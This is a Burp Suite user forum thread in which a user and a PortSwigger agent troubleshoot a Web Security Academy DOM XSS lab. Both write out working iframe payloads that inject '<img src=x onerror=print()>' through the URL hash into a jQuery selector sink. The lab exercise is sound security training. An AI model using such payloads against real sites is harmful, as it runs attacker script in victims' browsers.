Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

No solution seems to work on this lab

Geoffrey | Last updated: Jul 03, 2024 01:32PM UTC

Lab: DOM XSS in jQuery selector sink using a hashchange event I have tried <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print()>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net#" onload="this.src+='<img src=x onerror=print(1)>'"> <iframe src="https://0a51000e03217e2682062f3600220028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print(1)>'"></iframe> I've tried both with a slash and without a slash between .net and #. Just to see I tried other variations as well. I have tried on edge, embedded, firefox, and chrome. It works when I go to view exploit, but the lab does not get solved when I deliver it.

Ben, PortSwigger Agent | Last updated: Jul 03, 2024 04:37PM UTC

Hi Geoffrey, I have just run through this lab, using the Firefox browser, and the written solution solves the lab so this does appear to be working as expected. I was able to solve the lab by delivering the following exploit in the Exploit Server: <iframe src="https://0ac80082035514098298299200bf00b8.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.